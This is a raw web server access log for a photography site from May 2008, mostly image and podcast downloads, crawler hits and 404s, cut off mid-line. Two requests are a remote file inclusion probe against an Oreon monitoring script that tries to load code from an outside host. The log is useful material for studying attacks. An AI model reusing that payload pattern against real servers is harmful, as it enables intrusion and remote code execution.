67.186.192.242 - - [08/May/2008:15:30:03 -0700] "GET /downloads/pics/engagement/IMG_3210-Edit.jpg HTTP/1.1" 200 170638 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:04 -0700] "GET /downloads/pics/engagement/IMG_3286-Edit.jpg HTTP/1.1" 200 105519 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:05 -0700] "GET /downloads/pics/engagement/IMG_3237-Edit.jpg HTTP/1.1" 200 112191 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:05 -0700] "GET /downloads/pics/engagement/IMG_3232-Edit.jpg HTTP/1.1" 200 149011 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:12 -0700] "GET /2007/images_07/grad.jpg HTTP/1.1" 404 275 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:12 -0700] "GET /images/wedding%20pages/Gavin_Black-200x200.jpg HTTP/1.1" 404 275 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:24 -0700] "GET /2007/images_07/grad.jpg HTTP/1.1" 404 275 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:24 -0700] "GET /images/wedding%20pages/Gavin_Black-200x200.jpg HTTP/1.1" 404 275 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:35 -0700] "GET /2007/images_07/grad.jpg HTTP/1.1" 404 275 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:35 -0700] "GET /images/wedding%20pages/Gavin_Black-200x200.jpg HTTP/1.1" 404 275 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "wildpix.biz"
91.124.207.164 - - [08/May/2008:15:30:41 -0700] "POST /blog/2006/11/26/saturdays-wedding/trackback/ HTTP/1.1" 404 275 "-" "-" "wildpix.biz"
208.131.154.191 - - [08/May/2008:15:30:47 -0700] "GET /links_pps.php HTTP/1.0" 200 20142 "-" "-" "www.wildpix.biz"
208.131.154.191 - - [08/May/2008:15:30:48 -0700] "GET /links_pps.php HTTP/1.0" 200 20142 "-" "-" "www.wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:49 -0700] "GET /2007/images_07/grad.jpg HTTP/1.1" 404 275 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wildpix.biz"
67.186.192.242 - - [08/May/2008:15:30:49 -0700] "GET /images/wedding%20pages/Gavin_Black-200x200.jpg HTTP/1.1" 404 275 "http://gavseim.blogspot.com/2007/02/i-got-engaged-on-21707.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "wildpix.biz"
83.19.24.171 - - [08/May/2008:15:30:57 -0700] "GET /downloads/prophotoshow/TPPS2.jpg HTTP/1.1" 200 84141 "-" "IRIS/2007" "www.wildpix.biz"
72.41.223.243 - - [08/May/2008:15:38:36 -0700] "GET /links_pps.php HTTP/1.0" 200 20142 "-" "-" "www.wildpix.biz"
72.14.199.31 - - [08/May/2008:15:40:27 -0700] "GET /blog/feed/ HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 10 subscribers; feed-id=6290267017432928235)" "wildpix.biz"
64.183.218.54 - - [08/May/2008:15:41:41 -0700] "GET /downloads/prophotoshow/TPPS2.jpg HTTP/1.1" 200 84141 "-" "Zune/2.5" "www.wildpix.biz"
64.183.218.54 - - [08/May/2008:15:42:05 -0700] "GET /downloads/prophotoshow/TPPS2.jpg HTTP/1.1" 200 84141 "-" "IRIS/2007" "www.wildpix.biz"
64.15.69.3 - - [08/May/2008:15:42:22 -0700] "HEAD /downloads/prophotoshow/Pro_Photography_Show_Episode4_Sept_27th_2006.mp3 HTTP/1.1" 200 0 "-" "Java/1.6.0_01" "www.wildpix.biz"
64.183.218.54 - - [08/May/2008:15:43:04 -0700] "GET /downloads/prophotoshow/TPPS2.jpg HTTP/1.1" 200 84141 "-" "Zune/2.5" "www.wildpix.biz"
203.72.181.15 - - [08/May/2008:15:44:02 -0700] "GET /logs/access_080418.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wildpix.biz"
203.72.181.15 - - [08/May/2008:15:44:02 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.wildpix.biz"
24.166.137.227 - - [08/May/2008:15:45:01 -0700] "GET /downloads/prophotoshow/TPPS2.jpg HTTP/1.1" 200 84141 "-" "Zune/2.3" "www.wildpix.biz"
17.250.137.101 - - [08/May/2008:15:47:42 -0700] "HEAD /downloads/prophotoshow/TPPS2.jpg HTTP/1.1" 200 0 "-" "Jakarta Commons-HttpClient/3.0" "www.wildpix.biz"
74.125.16.37 - - [08/May/2008:15:48:25 -0700] "GET /googleb0621a89c95457ec.html HTTP/1.1" 404 275 "-" "Google-Sitemaps/1.0" "www.wildpix.biz"
74.125.16.39 - - [08/May/2008:15:48:25 -0700] "GET /GOOGLEb0621a89c95457ec.html HTTP/1.1" 404 275 "-" "Google-Sitemaps/1.0" "www.wildpix.biz"
74.125.16.39 - - [08/May/2008:15:48:25 -0700] "GET /googleb0621a89c95457ec.html HTTP/1.1" 404 275 "-" "Google-Sitemaps/1.0" "wildpix.biz"
74.125.16.68 - - [08/May/2008:15:48:25 -0700] "GET /GOOGLEb0621a89c95457ec.html HTTP/1.1" 404 275 "-" "Google-Sitemaps/1.0" "wildpix.biz"
66.7.202.107 - - [08/May/2008:15:48:33 -0700] "GET /links_pps.php HTTP/1.0" 200 20142 "-" "-" "www.wildpix.biz"
124.254.77.184 - - [08/May/2008:15:58:55 -0700] "GET /downloads/prophotoshow/TPPS2.jpg HTTP/1.1" 200 84141 "http://www.podbean.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.wildpix.biz"
202.108.23.56 - - [08/May/2008:16:08:55 -0700] "HEAD /downloads/Ace3.mp3 HTTP/1.0" 200 0 "http://202.108.23.172/index.html" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98; DigExt)" "wildpix.biz"
17.250.137.101 - - [08/May/2008:16:13:25 -0700] "HEAD /downloads/prophotoshow/TPPS2.jpg HTTP/1.1" 200 0 "-" "Jakarta Commons-HttpClient/3.0" "www.wildpix.biz"
72.3.232.138 - - [08/May/2008:16:18:05 -0700] "GET /downloads/prophotoshow/TPPS2.jpg HTTP/1.0" 200 84141 "-" "-" "www.wildpix.biz"
72.3.232.138 - - [08/May/2008:16:18:05 -0700] "GET /downloads/prophotoshow/TPPS2.jpg HTTP/1.0" 200 84141 "-" "-" "www.wildpix.biz"
17.250.137.99 - - [08/May/2008:16:20:00 -0700] "HEAD /downloads/prophotoshow/TPPS2.jpg HTTP/1.1" 200 0 "-" "Jakarta Commons-HttpClient/3.0" "www.wildpix.biz"
209.191.126.183 - - [08/May/2008:16:20:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Nokia6682/2.0 (3.01.1) SymbianOS/8.0 Series60/2.6 P